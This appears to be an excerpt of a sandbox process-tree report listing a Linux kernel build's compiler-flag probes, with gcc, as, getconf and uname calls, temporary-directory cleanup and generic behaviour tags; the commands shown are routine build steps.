/usr/bin/getconfgetconf LFS_CFLAGS4⤵PID:1560
-
/bin/sh/bin/sh -c "getconf LFS_LDFLAGS 2>/dev/null"3⤵PID:1561
-
/usr/bin/getconfgetconf LFS_LDFLAGS4⤵PID:1562
-
/bin/sh/bin/sh -c "getconf LFS_LIBS 2>/dev/null"3⤵PID:1563
-
/usr/bin/getconfgetconf LFS_LIBS4⤵PID:1564
-
/bin/sh/bin/sh -c "gcc -v 2>&1 | grep -q \"clang version\" && echo clang || echo gcc"3⤵PID:1565
-
/bin/grepgrep -q "clang version"4⤵PID:1567
-
/usr/bin/gccgcc -v4⤵PID:1566
-
/bin/sh/bin/sh -c "echo '__cached_gcc_-v_2>&1_|_grep_-q_\"clang_version\"_&&_echo_clang_||_echo_gcc := gcc' >> /tmp/a/.cache.mk"3⤵PID:1568
-
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; TMPO=/tmp/a/.tmp_\$\$/tmp.o; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( gcc -Werror -D__KERNEL__ -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -Werror-implicit-function-declaration -Werror=return-type -Wno-format-security -std=gnu89 -mretpoline-external-thunk -c -x c /dev/null -o \"\$TMP\") >/dev/null 2>&1; then echo \"-mretpoline-external-thunk\"; else echo \"\"; fi"3⤵PID:1569
-
/bin/mkdirmkdir -p /tmp/a/.tmp_15694⤵PID:1570
-
/usr/bin/gccgcc -Werror -D__KERNEL__ -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -Werror-implicit-function-declaration "-Werror=return-type" -Wno-format-security "-std=gnu89" -mretpoline-external-thunk -c -x c /dev/null -o /tmp/a/.tmp_1569/tmp4⤵PID:1571
-
/bin/rmrm -rf /tmp/a/.tmp_15694⤵PID:1572
-
/bin/sh/bin/sh -c "echo '__cached_set_-e;_TMP_/tmp/a/.tmp___/tmp;_TMPO_/tmp/a/.tmp___/tmp.o;_mkdir_-p_/tmp/a/.tmp___;_trap_\"rm_-rf_/tmp/a/.tmp___\"_EXIT;_if____gcc_-Werror__-D__KERNEL___-Wall_-Wundef_-Wstrict-prototypes_-Wno-trigraphs_-fno-strict-aliasing_-fno-common_-fshort-wchar_-Werror-implicit-function-declaration_-Werror_return-type_-Wno-format-security_-std_gnu89_-mretpoline-external-thunk_-c_-x_c_/dev/null_-o_\"_TMP\"__>/dev/null_2>&1;_then_echo_\"-mretpoline-external-thunk\";_else_echo_\"\";_fi := ' >> /tmp/a/.cache.mk"3⤵PID:1573
-
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; TMPO=/tmp/a/.tmp_\$\$/tmp.o; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( gcc -Werror -D__KERNEL__ -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -Werror-implicit-function-declaration -Werror=return-type -Wno-format-security -std=gnu89 -mindirect-branch=thunk-extern -mindirect-branch-register -c -x c /dev/null -o \"\$TMP\") >/dev/null 2>&1; then echo \"-mindirect-branch=thunk-extern -mindirect-branch-register\"; else echo \"\"; fi"3⤵PID:1574
-
/bin/mkdirmkdir -p /tmp/a/.tmp_15744⤵PID:1575
-
/usr/bin/gccgcc -Werror -D__KERNEL__ -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -Werror-implicit-function-declaration "-Werror=return-type" -Wno-format-security "-std=gnu89" "-mindirect-branch=thunk-extern" -mindirect-branch-register -c -x c /dev/null -o /tmp/a/.tmp_1574/tmp4⤵PID:1576
-
/usr/lib/gcc/x86_64-linux-gnu/7/cc1/usr/lib/gcc/x86_64-linux-gnu/7/cc1 -quiet -imultiarch x86_64-linux-gnu -D __KERNEL__ /dev/null -quiet -dumpbase null "-mindirect-branch=thunk-extern" -mindirect-branch-register "-mtune=generic" "-march=x86-64" -auxbase-strip /tmp/a/.tmp_1574/tmp -Werror -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs "-Werror=implicit-function-declaration" "-Werror=return-type" -Wno-format-security "-std=gnu90" -fno-strict-aliasing -fno-common -fshort-wchar -fstack-protector-strong -o /tmp/cctMB2IR.s5⤵PID:1577
-
/usr/local/sbin/asas --64 -o /tmp/a/.tmp_1574/tmp /tmp/cctMB2IR.s5⤵PID:1578
-
/usr/local/bin/asas --64 -o /tmp/a/.tmp_1574/tmp /tmp/cctMB2IR.s5⤵PID:1578
-
/usr/sbin/asas --64 -o /tmp/a/.tmp_1574/tmp /tmp/cctMB2IR.s5⤵PID:1578
-
/usr/bin/asas --64 -o /tmp/a/.tmp_1574/tmp /tmp/cctMB2IR.s5⤵PID:1578
-
/bin/rmrm -rf /tmp/a/.tmp_15744⤵PID:1584
-
/bin/sh/bin/sh -c "echo '__cached_set_-e;_TMP_/tmp/a/.tmp___/tmp;_TMPO_/tmp/a/.tmp___/tmp.o;_mkdir_-p_/tmp/a/.tmp___;_trap_\"rm_-rf_/tmp/a/.tmp___\"_EXIT;_if____gcc_-Werror__-D__KERNEL___-Wall_-Wundef_-Wstrict-prototypes_-Wno-trigraphs_-fno-strict-aliasing_-fno-common_-fshort-wchar_-Werror-implicit-function-declaration_-Werror_return-type_-Wno-format-security_-std_gnu89_-mindirect-branch_thunk-extern_-mindirect-branch-register_-c_-x_c_/dev/null_-o_\"_TMP\"__>/dev/null_2>&1;_then_echo_\"-mindirect-branch_thunk-extern_-mindirect-branch-register\";_else_echo_\"\";_fi := -mindirect-branch=thunk-extern -mindirect-branch-register' >> /tmp/a/.cache.mk"3⤵
- Command and Scripting Interpreter: Unix Shell
PID:1587 -
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; TMPO=/tmp/a/.tmp_\$\$/tmp.o; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( gcc -Werror -D__KERNEL__ -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -Werror-implicit-function-declaration -Werror=return-type -Wno-format-security -std=gnu89 -mretpoline -c -x c /dev/null -o \"\$TMP\") >/dev/null 2>&1; then echo \"-mretpoline\"; else echo \"\"; fi"3⤵PID:1588
-
/bin/mkdirmkdir -p /tmp/a/.tmp_15884⤵PID:1589
-
/usr/bin/gccgcc -Werror -D__KERNEL__ -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -Werror-implicit-function-declaration "-Werror=return-type" -Wno-format-security "-std=gnu89" -mretpoline -c -x c /dev/null -o /tmp/a/.tmp_1588/tmp4⤵PID:1590
-
/bin/rmrm -rf /tmp/a/.tmp_15884⤵PID:1591
-
/bin/sh/bin/sh -c "echo '__cached_set_-e;_TMP_/tmp/a/.tmp___/tmp;_TMPO_/tmp/a/.tmp___/tmp.o;_mkdir_-p_/tmp/a/.tmp___;_trap_\"rm_-rf_/tmp/a/.tmp___\"_EXIT;_if____gcc_-Werror__-D__KERNEL___-Wall_-Wundef_-Wstrict-prototypes_-Wno-trigraphs_-fno-strict-aliasing_-fno-common_-fshort-wchar_-Werror-implicit-function-declaration_-Werror_return-type_-Wno-format-security_-std_gnu89_-mretpoline_-c_-x_c_/dev/null_-o_\"_TMP\"__>/dev/null_2>&1;_then_echo_\"-mretpoline\";_else_echo_\"\";_fi := ' >> /tmp/a/.cache.mk"3⤵
- Command and Scripting Interpreter: Unix Shell
PID:1592 -
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; TMPO=/tmp/a/.tmp_\$\$/tmp.o; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( gcc -Werror -D__KERNEL__ -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -Werror-implicit-function-declaration -Werror=return-type -Wno-format-security -std=gnu89 -mindirect-branch=thunk-inline -mindirect-branch-register -c -x c /dev/null -o \"\$TMP\") >/dev/null 2>&1; then echo \"-mindirect-branch=thunk-inline -mindirect-branch-register\"; else echo \"\"; fi"3⤵PID:1593
-
/bin/mkdirmkdir -p /tmp/a/.tmp_15934⤵PID:1594
-
/usr/bin/gccgcc -Werror -D__KERNEL__ -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -Werror-implicit-function-declaration "-Werror=return-type" -Wno-format-security "-std=gnu89" "-mindirect-branch=thunk-inline" -mindirect-branch-register -c -x c /dev/null -o /tmp/a/.tmp_1593/tmp4⤵
- Writes file to tmp directory
PID:1595 -
/usr/lib/gcc/x86_64-linux-gnu/7/cc1/usr/lib/gcc/x86_64-linux-gnu/7/cc1 -quiet -imultiarch x86_64-linux-gnu -D __KERNEL__ /dev/null -quiet -dumpbase null "-mindirect-branch=thunk-inline" -mindirect-branch-register "-mtune=generic" "-march=x86-64" -auxbase-strip /tmp/a/.tmp_1593/tmp -Werror -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs "-Werror=implicit-function-declaration" "-Werror=return-type" -Wno-format-security "-std=gnu90" -fno-strict-aliasing -fno-common -fshort-wchar -fstack-protector-strong -o /tmp/cc2YOfSW.s5⤵
- Writes file to tmp directory
PID:1596 -
/usr/local/sbin/asas --64 -o /tmp/a/.tmp_1593/tmp /tmp/cc2YOfSW.s5⤵PID:1597
-
/usr/local/bin/asas --64 -o /tmp/a/.tmp_1593/tmp /tmp/cc2YOfSW.s5⤵PID:1597
-
/usr/sbin/asas --64 -o /tmp/a/.tmp_1593/tmp /tmp/cc2YOfSW.s5⤵PID:1597
-
/usr/bin/asas --64 -o /tmp/a/.tmp_1593/tmp /tmp/cc2YOfSW.s5⤵PID:1597
-
/bin/rmrm -rf /tmp/a/.tmp_15934⤵PID:1598
-
/bin/sh/bin/sh -c "echo '__cached_set_-e;_TMP_/tmp/a/.tmp___/tmp;_TMPO_/tmp/a/.tmp___/tmp.o;_mkdir_-p_/tmp/a/.tmp___;_trap_\"rm_-rf_/tmp/a/.tmp___\"_EXIT;_if____gcc_-Werror__-D__KERNEL___-Wall_-Wundef_-Wstrict-prototypes_-Wno-trigraphs_-fno-strict-aliasing_-fno-common_-fshort-wchar_-Werror-implicit-function-declaration_-Werror_return-type_-Wno-format-security_-std_gnu89_-mindirect-branch_thunk-inline_-mindirect-branch-register_-c_-x_c_/dev/null_-o_\"_TMP\"__>/dev/null_2>&1;_then_echo_\"-mindirect-branch_thunk-inline_-mindirect-branch-register\";_else_echo_\"\";_fi := -mindirect-branch=thunk-inline -mindirect-branch-register' >> /tmp/a/.cache.mk"3⤵
- Writes file to tmp directory
PID:1599 -
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; TMPO=/tmp/a/.tmp_\$\$/tmp.o; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( gcc -Werror -D__KERNEL__ -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -Werror-implicit-function-declaration -Werror=return-type -Wno-format-security -std=gnu89 -fno-PIE -c -x c /dev/null -o \"\$TMP\") >/dev/null 2>&1; then echo \"-fno-PIE\"; else echo \"\"; fi"3⤵
- Command and Scripting Interpreter: Unix Shell
PID:1600 -
/bin/mkdirmkdir -p /tmp/a/.tmp_16004⤵PID:1601
-
/usr/bin/gccgcc -Werror -D__KERNEL__ -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -Werror-implicit-function-declaration "-Werror=return-type" -Wno-format-security "-std=gnu89" -fno-PIE -c -x c /dev/null -o /tmp/a/.tmp_1600/tmp4⤵PID:1602
-
/usr/lib/gcc/x86_64-linux-gnu/7/cc1/usr/lib/gcc/x86_64-linux-gnu/7/cc1 -quiet -imultiarch x86_64-linux-gnu -D __KERNEL__ /dev/null -quiet -dumpbase null "-mtune=generic" "-march=x86-64" -auxbase-strip /tmp/a/.tmp_1600/tmp -Werror -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs "-Werror=implicit-function-declaration" "-Werror=return-type" -Wno-format-security "-std=gnu90" -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE -fstack-protector-strong -o /tmp/cchETkgZ.s5⤵PID:1603
-
/usr/local/sbin/asas --64 -o /tmp/a/.tmp_1600/tmp /tmp/cchETkgZ.s5⤵PID:1604
-
/usr/local/bin/asas --64 -o /tmp/a/.tmp_1600/tmp /tmp/cchETkgZ.s5⤵PID:1604
-
/usr/sbin/asas --64 -o /tmp/a/.tmp_1600/tmp /tmp/cchETkgZ.s5⤵PID:1604
-
/usr/bin/asas --64 -o /tmp/a/.tmp_1600/tmp /tmp/cchETkgZ.s5⤵PID:1604
-
/bin/rmrm -rf /tmp/a/.tmp_16004⤵PID:1606
-
/bin/sh/bin/sh -c "echo '__cached_set_-e;_TMP_/tmp/a/.tmp___/tmp;_TMPO_/tmp/a/.tmp___/tmp.o;_mkdir_-p_/tmp/a/.tmp___;_trap_\"rm_-rf_/tmp/a/.tmp___\"_EXIT;_if____gcc_-Werror__-D__KERNEL___-Wall_-Wundef_-Wstrict-prototypes_-Wno-trigraphs_-fno-strict-aliasing_-fno-common_-fshort-wchar_-Werror-implicit-function-declaration_-Werror_return-type_-Wno-format-security_-std_gnu89_-fno-PIE_-c_-x_c_/dev/null_-o_\"_TMP\"__>/dev/null_2>&1;_then_echo_\"-fno-PIE\";_else_echo_\"\";_fi := -fno-PIE' >> /tmp/a/.cache.mk"3⤵
- Writes file to tmp directory
PID:1607 -
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; TMPO=/tmp/a/.tmp_\$\$/tmp.o; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( gcc -Werror -D__KERNEL__ -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -Werror-implicit-function-declaration -Werror=return-type -Wno-format-security -std=gnu89 -fno-PIE -fno-PIE -c -x c /dev/null -o \"\$TMP\") >/dev/null 2>&1; then echo \"-fno-PIE\"; else echo \"\"; fi"3⤵PID:1608
-
/bin/mkdirmkdir -p /tmp/a/.tmp_16084⤵PID:1609
-
/usr/bin/gccgcc -Werror -D__KERNEL__ -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -Werror-implicit-function-declaration "-Werror=return-type" -Wno-format-security "-std=gnu89" -fno-PIE -fno-PIE -c -x c /dev/null -o /tmp/a/.tmp_1608/tmp4⤵PID:1610
-
/usr/lib/gcc/x86_64-linux-gnu/7/cc1/usr/lib/gcc/x86_64-linux-gnu/7/cc1 -quiet -imultiarch x86_64-linux-gnu -D __KERNEL__ /dev/null -quiet -dumpbase null "-mtune=generic" "-march=x86-64" -auxbase-strip /tmp/a/.tmp_1608/tmp -Werror -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs "-Werror=implicit-function-declaration" "-Werror=return-type" -Wno-format-security "-std=gnu90" -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE -fstack-protector-strong -o /tmp/ccVzw0N2.s5⤵
- Writes file to tmp directory
PID:1614 -
/usr/local/sbin/asas --64 -o /tmp/a/.tmp_1608/tmp /tmp/ccVzw0N2.s5⤵PID:1615
-
/usr/local/bin/asas --64 -o /tmp/a/.tmp_1608/tmp /tmp/ccVzw0N2.s5⤵PID:1615
-
/usr/sbin/asas --64 -o /tmp/a/.tmp_1608/tmp /tmp/ccVzw0N2.s5⤵PID:1615
-
/usr/bin/asas --64 -o /tmp/a/.tmp_1608/tmp /tmp/ccVzw0N2.s5⤵PID:1615
-
/bin/rmrm -rf /tmp/a/.tmp_16084⤵PID:1616
-
/bin/sh/bin/sh -c "echo '__cached_set_-e;_TMP_/tmp/a/.tmp___/tmp;_TMPO_/tmp/a/.tmp___/tmp.o;_mkdir_-p_/tmp/a/.tmp___;_trap_\"rm_-rf_/tmp/a/.tmp___\"_EXIT;_if____gcc_-Werror__-D__KERNEL___-Wall_-Wundef_-Wstrict-prototypes_-Wno-trigraphs_-fno-strict-aliasing_-fno-common_-fshort-wchar_-Werror-implicit-function-declaration_-Werror_return-type_-Wno-format-security_-std_gnu89_-fno-PIE_-fno-PIE_-c_-x_c_/dev/null_-o_\"_TMP\"__>/dev/null_2>&1;_then_echo_\"-fno-PIE\";_else_echo_\"\";_fi := -fno-PIE' >> /tmp/a/.cache.mk"3⤵PID:1617
-
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; TMPO=/tmp/a/.tmp_\$\$/tmp.o; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( gcc -Werror -D__KERNEL__ -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -Werror-implicit-function-declaration -Werror=return-type -Wno-format-security -std=gnu89 -fno-PIE -Wmaybe-uninitialized -c -x c /dev/null -o \"\$TMP\") >/dev/null 2>&1; then echo \"-Wno-maybe-uninitialized\"; else echo \"\"; fi"3⤵PID:1618
-
/bin/mkdirmkdir -p /tmp/a/.tmp_16184⤵
- Reads runtime system information
PID:1619 -
/usr/bin/gccgcc -Werror -D__KERNEL__ -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -Werror-implicit-function-declaration "-Werror=return-type" -Wno-format-security "-std=gnu89" -fno-PIE -Wmaybe-uninitialized -c -x c /dev/null -o /tmp/a/.tmp_1618/tmp4⤵PID:1620
-
/usr/lib/gcc/x86_64-linux-gnu/7/cc1/usr/lib/gcc/x86_64-linux-gnu/7/cc1 -quiet -imultiarch x86_64-linux-gnu -D __KERNEL__ /dev/null -quiet -dumpbase null "-mtune=generic" "-march=x86-64" -auxbase-strip /tmp/a/.tmp_1618/tmp -Werror -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs "-Werror=implicit-function-declaration" "-Werror=return-type" -Wno-format-security -Wmaybe-uninitialized "-std=gnu90" -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE -fstack-protector-strong -o /tmp/ccTVAfQ1.s5⤵PID:1621
-
/usr/local/sbin/asas --64 -o /tmp/a/.tmp_1618/tmp /tmp/ccTVAfQ1.s5⤵PID:1622
-
/usr/local/bin/asas --64 -o /tmp/a/.tmp_1618/tmp /tmp/ccTVAfQ1.s5⤵PID:1622
-
/usr/sbin/asas --64 -o /tmp/a/.tmp_1618/tmp /tmp/ccTVAfQ1.s5⤵PID:1622
-
/usr/bin/asas --64 -o /tmp/a/.tmp_1618/tmp /tmp/ccTVAfQ1.s5⤵PID:1622
-
/bin/rmrm -rf /tmp/a/.tmp_16184⤵PID:1623
-
/bin/sh/bin/sh -c "echo '__cached_set_-e;_TMP_/tmp/a/.tmp___/tmp;_TMPO_/tmp/a/.tmp___/tmp.o;_mkdir_-p_/tmp/a/.tmp___;_trap_\"rm_-rf_/tmp/a/.tmp___\"_EXIT;_if___gcc_-Werror_-D__KERNEL___-Wall_-Wundef_-Wstrict-prototypes_-Wno-trigraphs_-fno-strict-aliasing_-fno-common_-fshort-wchar_-Werror-implicit-function-declaration_-Werror_return-type_-Wno-format-security_-std_gnu89_-fno-PIE_-Wmaybe-uninitialized_-c_-x_c_/dev/null_-o_\"_TMP\"__>/dev/null_2>&1;_then_echo_\"-Wno-maybe-uninitialized\";_else_echo_\"\";_fi := -Wno-maybe-uninitialized' >> /tmp/a/.cache.mk"3⤵PID:1624
-
/usr/local/sbin/unameuname -m3⤵PID:1625
-
/usr/local/bin/unameuname -m3⤵PID:1625
-
/usr/sbin/unameuname -m3⤵PID:1625
-
/usr/bin/unameuname -m3⤵PID:1625
-
/sbin/unameuname -m3⤵PID:1625
-
/bin/unameuname -m3⤵PID:1625
-
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; TMPO=/tmp/a/.tmp_\$\$/tmp.o; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( gcc -Werror -D__KERNEL__ -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -Werror-implicit-function-declaration -Werror=return-type -Wno-format-security -std=gnu89 -fno-PIE -mpreferred-stack-boundary=4 -c -x c /dev/null -o \"\$TMP\") >/dev/null 2>&1; then echo \" -mpreferred-stack-boundary=4\"; else echo \"\"; fi"3⤵
- Command and Scripting Interpreter: Unix Shell
PID:1626 -
/bin/mkdirmkdir -p /tmp/a/.tmp_16264⤵PID:1627
-
/usr/bin/gccgcc -Werror -D__KERNEL__ -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -Werror-implicit-function-declaration "-Werror=return-type" -Wno-format-security "-std=gnu89" -fno-PIE "-mpreferred-stack-boundary=4" -c -x c /dev/null -o /tmp/a/.tmp_1626/tmp4⤵PID:1628
-
/usr/lib/gcc/x86_64-linux-gnu/7/cc1/usr/lib/gcc/x86_64-linux-gnu/7/cc1 -quiet -imultiarch x86_64-linux-gnu -D __KERNEL__ /dev/null -quiet -dumpbase null "-mpreferred-stack-boundary=4" "-mtune=generic" "-march=x86-64" -auxbase-strip /tmp/a/.tmp_1626/tmp -Werror -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs "-Werror=implicit-function-declaration" "-Werror=return-type" -Wno-format-security "-std=gnu90" -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE -fstack-protector-strong -o /tmp/ccbKJrC5.s5⤵PID:1629
-
/usr/local/sbin/asas --64 -o /tmp/a/.tmp_1626/tmp /tmp/ccbKJrC5.s5⤵PID:1630
-
/usr/local/bin/asas --64 -o /tmp/a/.tmp_1626/tmp /tmp/ccbKJrC5.s5⤵PID:1630
-
/usr/sbin/asas --64 -o /tmp/a/.tmp_1626/tmp /tmp/ccbKJrC5.s5⤵PID:1630
-
/usr/bin/asas --64 -o /tmp/a/.tmp_1626/tmp /tmp/ccbKJrC5.s5⤵PID:1630
-
/bin/rmrm -rf /tmp/a/.tmp_16264⤵PID:1631
-
/bin/sh/bin/sh -c "echo '__cached_set_-e;_TMP_/tmp/a/.tmp___/tmp;_TMPO_/tmp/a/.tmp___/tmp.o;_mkdir_-p_/tmp/a/.tmp___;_trap_\"rm_-rf_/tmp/a/.tmp___\"_EXIT;_if____gcc_-Werror__-D__KERNEL___-Wall_-Wundef_-Wstrict-prototypes_-Wno-trigraphs_-fno-strict-aliasing_-fno-common_-fshort-wchar_-Werror-implicit-function-declaration_-Werror_return-type_-Wno-format-security_-std_gnu89_-fno-PIE__-mpreferred-stack-boundary_4_-c_-x_c_/dev/null_-o_\"_TMP\"__>/dev/null_2>&1;_then_echo_\"_-mpreferred-stack-boundary_4\";_else_echo_\"\";_fi := -mpreferred-stack-boundary=4' >> /tmp/a/.cache.mk"3⤵PID:1632
-
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; TMPO=/tmp/a/.tmp_\$\$/tmp.o; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( gcc -Werror -D__KERNEL__ -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -Werror-implicit-function-declaration -Werror=return-type -Wno-format-security -std=gnu89 -fno-PIE -m16 -c -x c /dev/null -o \"\$TMP\") >/dev/null 2>&1; then echo \" -m16\"; else echo \" -m32 -Wa,./arch/x86/boot/code16gcc.h\"; fi"3⤵PID:1633
-
/bin/mkdirmkdir -p /tmp/a/.tmp_16334⤵PID:1634
-
/usr/bin/gccgcc -Werror -D__KERNEL__ -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -Werror-implicit-function-declaration "-Werror=return-type" -Wno-format-security "-std=gnu89" -fno-PIE -m16 -c -x c /dev/null -o /tmp/a/.tmp_1633/tmp4⤵
- Writes file to tmp directory
PID:1635 -
/usr/lib/gcc/x86_64-linux-gnu/7/cc1/usr/lib/gcc/x86_64-linux-gnu/7/cc1 -quiet -imultiarch x86_64-linux-gnu -D __KERNEL__ /dev/null -quiet -dumpbase null -m16 "-mtune=generic" "-march=x86-64" -auxbase-strip /tmp/a/.tmp_1633/tmp -Werror -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs "-Werror=implicit-function-declaration" "-Werror=return-type" -Wno-format-security "-std=gnu90" -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE -fstack-protector-strong -o /tmp/ccEXSwF4.s5⤵PID:1636
-
/usr/local/sbin/asas --32 -o /tmp/a/.tmp_1633/tmp /tmp/ccEXSwF4.s5⤵PID:1637
-
/usr/local/bin/asas --32 -o /tmp/a/.tmp_1633/tmp /tmp/ccEXSwF4.s5⤵PID:1637
-
/usr/sbin/asas --32 -o /tmp/a/.tmp_1633/tmp /tmp/ccEXSwF4.s5⤵PID:1637
-
/usr/bin/asas --32 -o /tmp/a/.tmp_1633/tmp /tmp/ccEXSwF4.s5⤵PID:1637
-
/bin/rmrm -rf /tmp/a/.tmp_16334⤵PID:1638
-
/bin/sh/bin/sh -c "echo '__cached_set_-e;_TMP_/tmp/a/.tmp___/tmp;_TMPO_/tmp/a/.tmp___/tmp.o;_mkdir_-p_/tmp/a/.tmp___;_trap_\"rm_-rf_/tmp/a/.tmp___\"_EXIT;_if____gcc_-Werror__-D__KERNEL___-Wall_-Wundef_-Wstrict-prototypes_-Wno-trigraphs_-fno-strict-aliasing_-fno-common_-fshort-wchar_-Werror-implicit-function-declaration_-Werror_return-type_-Wno-format-security_-std_gnu89_-fno-PIE__-m16_-c_-x_c_/dev/null_-o_\"_TMP\"__>/dev/null_2>&1;_then_echo_\"_-m16\";_else_echo_\"_-m32_-Wa_./arch/x86/boot/code16gcc.h\";_fi := -m16' >> /tmp/a/.cache.mk"3⤵PID:1639
-
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; TMPO=/tmp/a/.tmp_\$\$/tmp.o; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( gcc -Werror -D__KERNEL__ -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -Werror-implicit-function-declaration -Werror=return-type -Wno-format-security -std=gnu89 -fno-PIE -fcf-protection=none -c -x c /dev/null -o \"\$TMP\") >/dev/null 2>&1; then echo \"-fcf-protection=none\"; else echo \"\"; fi"3⤵PID:1640
-
/bin/mkdirmkdir -p /tmp/a/.tmp_16404⤵PID:1641
-
/usr/bin/gccgcc -Werror -D__KERNEL__ -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -Werror-implicit-function-declaration "-Werror=return-type" -Wno-format-security "-std=gnu89" -fno-PIE "-fcf-protection=none" -c -x c /dev/null -o /tmp/a/.tmp_1640/tmp4⤵PID:1642
-
/bin/rmrm -rf /tmp/a/.tmp_16404⤵PID:1643
-
/bin/sh/bin/sh -c "echo '__cached_set_-e;_TMP_/tmp/a/.tmp___/tmp;_TMPO_/tmp/a/.tmp___/tmp.o;_mkdir_-p_/tmp/a/.tmp___;_trap_\"rm_-rf_/tmp/a/.tmp___\"_EXIT;_if____gcc_-Werror__-D__KERNEL___-Wall_-Wundef_-Wstrict-prototypes_-Wno-trigraphs_-fno-strict-aliasing_-fno-common_-fshort-wchar_-Werror-implicit-function-declaration_-Werror_return-type_-Wno-format-security_-std_gnu89_-fno-PIE_-fcf-protection_none_-c_-x_c_/dev/null_-o_\"_TMP\"__>/dev/null_2>&1;_then_echo_\"-fcf-protection_none\";_else_echo_\"\";_fi := ' >> /tmp/a/.cache.mk"3⤵
- Command and Scripting Interpreter: Unix Shell
PID:1644 -
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; TMPO=/tmp/a/.tmp_\$\$/tmp.o; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( gcc -Werror -m16 -g -Os -D__KERNEL__ -DDISABLE_BRANCH_PROFILING -Wall -Wstrict-prototypes -march=i386 -mregparm=3 -fno-strict-aliasing -fomit-frame-pointer -fno-pic -mno-mmx -mno-sse -ffreestanding -c -x c /dev/null -o \"\$TMP\") >/dev/null 2>&1; then echo \" -ffreestanding\"; else echo \"\"; fi"3⤵PID:1645
-
/bin/mkdirmkdir -p /tmp/a/.tmp_16454⤵PID:1646
-
/usr/bin/gccgcc -Werror -m16 -g -Os -D__KERNEL__ -DDISABLE_BRANCH_PROFILING -Wall -Wstrict-prototypes "-march=i386" "-mregparm=3" -fno-strict-aliasing -fomit-frame-pointer -fno-pic -mno-mmx -mno-sse -ffreestanding -c -x c /dev/null -o /tmp/a/.tmp_1645/tmp4⤵PID:1647
-
